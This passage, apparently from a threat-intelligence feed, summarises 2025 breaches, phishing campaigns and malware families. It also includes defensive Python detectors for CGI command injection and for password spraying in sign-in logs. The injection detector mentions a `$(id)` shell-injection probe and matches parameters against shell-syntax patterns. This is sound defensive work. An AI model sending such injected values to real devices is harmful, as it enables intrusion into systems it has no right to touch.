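    for pair in encoded.split("&"):
        if not pair or pair == "-":
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def parse_log(text):
    records = []
    for line in text.splitlines():
        ip, ts, method, target, body = line.split("\t")
        path, _, query = target.partition("?")
        # Query-string and body parameters are decoded the same way; body wins on a name clash.
        records.append({"ip": ip, "ts": ts, "method": method, "path": path,
                        "params": {**parse_params(query), **parse_params(body)}})
    return records


def detect_cgi_injection(records, endpoint="/datesetting.cgi"):
    """Flag requests to the CGI endpoint whose decoded parameters carry shell syntax."""
    alerts = []
    for r in records:
        if r["path"].lower() != endpoint:
            continue
        for name, value in r["params"].items():
            hits = [label for label, rx in INDICATOR_RES if rx.search(value)]
            if hits:
                alerts.append({"ip": r["ip"], "ts": r["ts"], "param": name,
                               "value": value, "indicators": hits})
    return alerts


if __name__ == "__main__":
    for a in detect_cgi_injection(parse_log(SAMPLE_LOG)):
        print(a["ip"], a["param"], a["indicators"], repr(a["value"]))
```

    Decoding before matching matters: the `$(id)` probe arrives as `%24%28id%29` and a pattern applied to the raw URL would miss it. A source IP that trips this rule against several devices in a short time is the scanner, and is worth blocking at the perimeter regardless of whether the devices themselves can be fixed.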

  • May 07, 2025

    • Government
    • Europe
    • Uk Government
    • United Kingdom

    UK's Legal Aid Agency Reports Data Breach

    In May 2025, the UK Legal Aid Agency (LAA) became the victim of a data breach when threat actors managed to gain access to its systems. According to the LAA, there is a risk that financial information belonging to legal aid providers, including barristers and solicitor firms, may have been compromised, although the agency could not confirm if any data was accessed.

  • May 06, 2025

    • Senegal
    • Sub-Saharan Africa
    • Africa
    • Government
    • Rhpolice.Sec.Gouv.Sn
    • Kazu

    Threat Actor Claims to Have Breached Senegal's National Police, Extracting Over 150 GB of Data

    In May 2025, threat actors using the aliases "Kazu" and "Joe" claimed to have breached the HR portal of the Senegal National Police and to have gained access to its database. According to the actors, 152 GB of data belonging to police personnel was taken, including ID cards, passports, education certificates, birth certificates, certificates of nationality, CVs, personal service records, certificates of good conduct, and authorizations to compete.

  • May 06, 2025

    • Finance
    • Bmci
    • Africa
    • Sudo_Xxxx
    • Morocco
    • Northern Africa

    Threat Actor Claims to Have Breached Moroccan BMCI Bank

    In May 2025, a threat actor named sudo_xxxx claimed to have breached BMCI Bank and gained access to its database. According to the threat actor, a substantial amount of data belonging to the bank's customers was taken, including client IDs, passwords, and account balances.

  • May 05, 2025

    • Telemessage
    • Telecommunications
    • Asia
    • Israel
    • Middle East

    Threat Actor Claims to Have Breached TeleMessage

    In May 2025, a threat actor breached TeleMessage, an Israeli company that provides modified versions of messaging apps like Signal, WhatsApp, Telegram, and WeChat to U.S. government agencies for message archiving. The threat actor accessed archived message contents, usernames and passwords for backend systems, and contact details for officials from agencies such as Customs and Border Protection, as well as employees of companies like Coinbase and Galaxy Digital. The data included snapshots of unencrypted messages, backend credentials, and communication metadata stored on TeleMessage’s servers.

  • May 05, 2025

    • Golden Chickens
    • Terrastealerv2
    • Terralogger

    Golden Chickens Unveils New Malware Families: TerraStealerV2 and TerraLogger

    The threat actor group known as Golden Chickens, also tracked as Venom Spider, has been linked to two new malware families, TerraStealerV2 and TerraLogger, built for credential theft and keylogging respectively. TerraStealerV2 collects browser credentials and cryptocurrency wallet data, while TerraLogger is a standalone keylogger with no exfiltration capability of its own. Both are believed to be under active development, continuing the group's expansion of an arsenal it offers under a malware-as-a-service model. The group is reportedly based in Canada and Romania and has been active since at least 2018.

  • May 04, 2025

    • United States
    • Business Services
    • North America
    • CVE-2025-3928
    • Commvault Systems

    Commvault Reports February 20, 2025 Breach of Its Azure Environment via Zero-Day

    In February 2025, Commvault became the victim of a breach when threat actors gained access to its Azure cloud environment through a zero-day vulnerability, tracked as CVE-2025-3928. According to Commvault, the unauthorized access affected a small number of customers, and there was no evidence that any customer data was compromised.

  • May 04, 2025

    • Manufacturing
    • North America
    • Terrasource Global
    • United States

    TerraSource Reports Data Breach Following Unauthorized Access by a Third Party

    In May 2025, TerraSource Global became the victim of a data breach when threat actors managed to gain access to its database. According to TerraSource, sensitive personal identifiable information and protected health information belonging to an undetermined number of individuals was taken, including names, social security numbers, dates of birth, addresses, driver’s license numbers, government-issued ID numbers, financial information, medical information, and health insurance information.

  • May 04, 2025

    • Finance
    • Manufacturing
    • Energy
    • Phishing
    • Russia
    • Telecommunications
    • Europe
    • Eastern Europe
    • Media
    • Retail
    • Hive0117
    • Insurance Agents, Brokers And Service
    • Tourism
    • Transportation

    Phishing Campaign Targets Russian Industries with DarkWatchman Malware

    A large-scale phishing campaign has been targeting Russian companies across sectors including media, finance, and energy with the DarkWatchman malware. Attributed to the financially motivated group Hive0117, the campaign has run in multiple waves since September 2023 and relies on social-engineering lures such as courier-delivery themes to get victims to open password-protected malicious archives (the password also keeps mail gateways from inspecting the contents). DarkWatchman is a JavaScript-based remote access trojan capable of keylogging and detection evasion, posing a significant risk to targeted organizations in Russia, Kazakhstan, Latvia, and Estonia.

  • Apr 30, 2025

    • Purplehaze
    • Government
    • Goreshell
    • Sentinelone
    • Asia
    • South-Eastern Asia
    • Shadowpad

    SentinelOne Uncovers Chinese Espionage Campaign Targeting its Infrastructure and Clients

    SentinelOne has identified a China-nexus threat cluster, PurpleHaze, that has been conducting reconnaissance against SentinelOne's own infrastructure and its high-value customers. The cluster is loosely associated with the state-sponsored group APT15 and has targeted a South Asian government entity with a Windows backdoor called GoReShell. The attackers used an operational relay box (ORB) network to obscure the origin of their activity. Earlier intrusions involved ShadowPad, a backdoor linked to a range of espionage operations, indicating a potential overlap in operations.

  • Apr 30, 2025

    • Movistar Venezuela
    • Cypher404X
    • Venezuela
    • Telecommunications
    • Latin America And The Caribbean

    Threat Actor Claims to Have Breached Movistar Venezuela

    In April 2025, a threat actor named "Cypher404x" claimed to have breached Movistar Venezuela and to have gained access to its database. According to the threat actor, 4,376,105 records belonging to Movistar's customers were taken, including personal data.

  • Apr 29, 2025

    • Phishing
    • United States
    • Business Services
    • North America
    • Woocommerce

    Phishing Campaign Targets WooCommerce Users with Fake Security Alerts

    Cybersecurity researchers have identified a large-scale phishing campaign targeting WooCommerce users with fake security alerts urging them to download a 'critical patch'. The activity is believed to be a variant of an earlier campaign that cited a fabricated CVE to compromise WordPress sites. The emails lead to a spoofed WooCommerce marketplace page from which victims download malware that creates a new administrator account on their site, giving attackers remote control to inject spam, redirect visitors, or launch DDoS attacks. WooCommerce ships fixes through the normal WordPress update mechanism, never as a download linked from an email, and an unexpected administrator account is the first thing to look for on a site that may have installed the 'patch'.

  • Apr 28, 2025

    • Finance
    • Phishing
    • Paypal
    • United States
    • Financial Theft
    • North America
    • Asia
    • Israel
    • Middle East

    Phishing Campaign Targets Israeli Customers Using PayPal's Donation Feature

    A phishing campaign circulating in Israel over the past 24 hours exploits PayPal's donation feature to appear legitimate. Attackers send SMS messages demanding payment of a shipping fee. Rather than directing recipients to a fraudulent site that harvests card details, the message links to a genuine PayPal donation page showing the same amount requested in the SMS. To bolster perceived legitimacy, the actors dress the donation page with familiar logos, such as Israel Post, and copy PayPal's styling and wording almost verbatim, relying on the victim's trust in the PayPal brand. Once the victim pays, the funds go straight to the attacker's PayPal account. Because the page is genuinely PayPal's, URL and certificate checks will not flag it; the tell is the recipient named on the donation page, not the address bar.

  • Apr 28, 2025

    • Critical Infrastructures
    • United States
    • North America
    • L33Tfg
    • Pjm Interconnection

    Threat Actor Claims Breach of PJM Interconnection

    In April 2025, a threat actor named l33tfg claimed to have breached PJM Interconnection LLC, the largest electric transmission system in North America, and to have gained access to its database. According to the threat actor, over 4,000 leaked database entries belonging to PJM's customers were taken, including personal information such as names, email addresses, and phone numbers.

  • Apr 28, 2025

    • Gatito_Fbi_Nz
    • Dinac
    • Latin America And The Caribbean
    • Paraguay
    • Automotive

    Threat Actor Claims to Have Breached DINAC - The National Directory of Civil Aeronautics of Paraguay

    In April 2025, a threat actor named Gatito_FBI_Nz claimed to have breached the Dirección Nacional de Aeronáutica Civil (DINAC) in Paraguay and to have gained access to its database. According to the threat actor, a complete dump was extracted from the agency's cloud system, including several internal documents believed to relate to national security, such as curricula vitae and other sensitive information.

  • Apr 27, 2025

    • Arabian_Ghosts
    • Network Denial Of Service
    • Business Services
    • Israel
    • Asia
    • Middle East
    • Mprest

    DDoS Attack on mPrest, an Israeli Technology Company Specializing in Critical Infrastructure

    On April 27th, the hacktivist group Arabian Ghosts claimed to have launched a DDoS attack against the website of mPrest, an Israeli technology company specializing in software and smart control systems for sectors such as energy, defense, and critical infrastructure. The claim was posted with the hashtag #OpIsrael, suggesting a connection to the broader OpIsrael campaign.

  • Apr 27, 2025

    • Critical Infrastructures
    • Arabian_Ghosts
    • Israel Port
    • Network Denial Of Service
    • Asia
    • Israel
    • Middle East

    DDoS Attack on Israel Ports Company (Israports)

    On April 27th, the hacktivist group Arabian Ghosts claimed to have launched a DDoS attack against the website of Israel Ports Company (Israports), the state-owned company responsible for developing and maintaining Israel's seaport infrastructure. The claim was posted with the hashtag #OpIsrael, suggesting a connection to the broader OpIsrael campaign.

  • Apr 27, 2025

    • Resource Hijacking
    • Password Spraying
    • Education
    • Storm-1977

    Storm-1977 Targets Education Sector with Password Spraying Attacks

    Investigators have reported that a threat actor known as Storm-1977 has been conducting password spraying attacks against cloud tenants in the education sector over the past year. The attacks utilize a command-line interface tool called azurechecker.exe, which connects to an external server to retrieve AES-encrypted data containing a list of targets. The attackers have successfully compromised accounts, creating resource groups and deploying over 200 containers for illicit cryptocurrency mining.
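    Password spraying has a signature that single-account lockout policies never see: one source trying one or two passwords against many accounts. As an added example (not code from the investigation or from Microsoft), the script below reads sign-in records in the spirit of Entra ID sign-in logs and flags a source IP that, inside a sliding window, attempts many distinct users with mostly failures, reporting any account that succeeded from the same source. The log, tenant domain, addresses and timestamps are constructed placeholders.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in records (timestamp,user,source IP,result code) in the spirit of
# Entra ID sign-in logs, where 0 is success and 50126 is "invalid username or password".
# The tenant domain, users and addresses are placeholders, not real tenant data.
SIGNIN_LOG = """\
2025-04-20T02:00:01Z,u01@uni.example,203.0.113.50,50126
2025-04-20T02:00:04Z,u02@uni.example,203.0.113.50,50126
2025-04-20T02:00:07Z,u03@uni.example,203.0.113.50,50126
2025-04-20T02:00:10Z,u04@uni.example,203.0.113.50,50126
2025-04-20T02:00:13Z,u05@uni.example,203.0.113.50,50126
2025-04-20T02:00:16Z,u06@uni.example,203.0.113.50,50126
2025-04-20T02:00:19Z,u07@uni.example,203.0.113.50,50126
2025-04-20T02:00:22Z,u08@uni.example,203.0.113.50,50126
2025-04-20T02:00:25Z,u09@uni.example,203.0.113.50,50126
2025-04-20T02:00:28Z,u10@uni.example,203.0.113.50,50126
2025-04-20T02:00:40Z,u07@uni.example,203.0.113.50,0
2025-04-20T02:05:00Z,alice@uni.example,198.51.100.7,0
2025-04-20T02:06:00Z,carol@uni.example,192.0.2.9,50126
2025-04-20T02:06:10Z,carol@uni.example,192.0.2.9,50126
2025-04-20T02:06:30Z,carol@uni.example,192.0.2.9,0
"""


def parse_signins(text):
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, code = line.split(",")
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "user": user.lower(), "ip": ip, "success": code.strip() == "0"})
    return events


def detect_password_spray(events, window=timedelta(minutes=60), min_users=5, min_fail_ratio=0.8):
    """One source, many distinct accounts, mostly failures inside a sliding window.
    A brute force against a single account (many failures, one user) does not qualify,
    nor does a user mistyping their own password a few times."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_ip[e["ip"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        best, start = None, 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:   # slide the window start forward
                start += 1
            win = evs[start:end + 1]
            users = {e["user"] for e in win}
            failures = sum(1 for e in win if not e["success"])
            if len(users) >= min_users and failures / len(win) >= min_fail_ratio:
                cand = {"ip": ip, "first": win[0]["ts"], "last": win[-1]["ts"],
                        "users": len(users), "attempts": len(win), "failures": failures,
                        "compromised": sorted(e["user"] for e in win if e["success"])}
                # keep the widest window for this source so a late success is not lost
                if best is None or (cand["users"], cand["attempts"]) > (best["users"], best["attempts"]):
                    best = cand
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_password_spray(parse_signins(SIGNIN_LOG)):
        print(a["ip"], a["users"], "users", a["failures"], "failures", "compromised:", a["compromised"])
```

    The compromised list is the part that matters for response: an account that succeeded from a spraying source is where to look next for the resource-group creation and container deployments the report describes, and is the account to reset and re-enrol for MFA first. Sprays that rotate source IPs per attempt defeat a per-IP rule; grouping on user-agent or on the application ID used for sign-in is the usual next step.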

  • Apr 24, 2025

    • Finance
    • Israel'S National Insurance
    • Phishing
    • Insurance Agents, Brokers And Service
    • Asia
    • Israel
    • Middle East

    Phishing Campaign Targets Israelis with Fake Bituach Leumi Emails

    CERT-IL warns of a phishing campaign impersonating Israel's National Insurance Institute (Bituach Leumi). Victims receive fake emails urging them to download a "report", which instead installs ScreenConnect, a legitimate remote-support tool abused here as a remote access trojan, giving attackers remote access to the machine. The campaign uses spoofed domains and a disguised .exe file. Authorities urge caution and monitoring for the published indicators of compromise (IOCs).

  • Apr 24, 2025

    • Sentap
    • Latin America And The Caribbean
    • 3Ipe
    • Business Services
    • Chile

    Threat Actor Sells Data Belonging to 3ipe

    In April 2025, a threat actor named Sentap claimed to have breached 3ipe.com and to have gained access to its database. According to the threat actor, 568 GB of exclusive engineering and commercial data belonging to 3ipe's customers was taken, including technical and scientific documents, commercial and project data, visual content, geographic data, management tools, and human resources archives. The threat actor is selling the dataset for $12,000.

  • Apr 24, 2025

    • Spearphishing Link
    • Web Protocols
    • Lonefleet
    • Malicious File
    • Blackshadow
    • Match Legitimate Name Or Location
    • Data From Local System
    • Asia
    • Command And Scripting Interpreter
    • Israel
    • Middle East
    • Murkytour

    Iran-Linked Hackers Deploy MURKYTOUR Malware in Fake Job Scheme Targeting Israel

    In October 2024, Iranian-aligned threat actor UNC2428 launched a sophisticated cyber espionage campaign against Israel using a backdoor malware named MURKYTOUR. Disguised as a job recruitment effort from Israeli defense contractor Rafael, the attackers lured victims into downloading a fake job application tool called "RafaelConnect.exe." The installer, dubbed LONEFLEET, featured a convincing graphical interface to collect personal data and resumes. Meanwhile, the MURKYTOUR malware was covertly deployed via a launcher known as LEAFPILE, granting the hackers persistent access to infected systems. This campaign, linked to Iran’s Ministry of Intelligence and Security (MOIS), overlaps with activity attributed to the Iranian group Black Shadow and is part of broader Iranian efforts targeting multiple sectors in Israel.

  • Apr 24, 2025

    • Eastern Europe
    • Russia
    • Government
    • Europe

    Russian Military Targeted by New Android Spyware Campaign

    Cybersecurity researchers have uncovered a malicious campaign targeting Russian military personnel, distributing Android spyware disguised as the Alpine Quest mapping software. The malware, identified as android.spy.1292.origin, is embedded in modified versions of the app and is propagated through Russian app catalogs and fake Telegram channels. Once installed, it collects sensitive data such as phone numbers, contact lists, geolocation, and stored files, while also allowing attackers to exfiltrate files via Telegram and WhatsApp. The campaign exploits the app's popularity among military users, emphasizing the need for caution when downloading apps from untrusted sources.

  • Apr 23, 2025

    • Eastern Asia
    • China
    • R00TK1T
    • DJI
    • Technology
    • Asia

    R00TK1T Claims DJI Customer Data Theft

    On April 21, 2025, a threat actor group identifying as "R00TK1T" publicly claimed responsibility for breaching DJI’s systems and exfiltrating a large amount of sensitive customer data. According to their statement, the stolen information includes order details, customer names, tracking numbers, pricing, drone specifications, contact information, and payment methods. The group is allegedly selling the data through a private channel.

  • Apr 23, 2025

    • Go-Net Software Solutions
    • Business Services
    • Cyber Toufan Operation
    • Asia
    • Israel
    • Middle East

    Cyber Toufan Claims Breach of Israeli Software Firm 'Go-Net'

    The pro-Palestinian hacktivist group Cyber Toufan claimed responsibility for breaching the Israeli software development firm Go-Net Software Solutions, which allegedly provides services to entities such as the IDF, insurance companies, and banks. In a Telegram post, the group alleged it had maintained persistent access to Go-Net’s network for over a year, during which it exfiltrated source code and internal databases. A sample of the stolen data was released publicly, with more sensitive material reportedly shared with affiliated threat actors. Go-Net has yet to comment on the incident, and the extent of the breach remains unverified.

  • Apr 23, 2025

    • Southern Asia
    • Nepal
    • Government
    • Nepal Police
    • Asia
    • Kazu

    Threat Actor Claims to Have Breached The Nepal Police

    In April 2025, a threat actor named Kazu claimed to have breached the Nepal Police Central Website and to have gained access to its database. According to the threat actor, over 2 million citizen records held by the Nepal Police were taken, including face images, ID cards, passports, and personally identifiable information (PII).
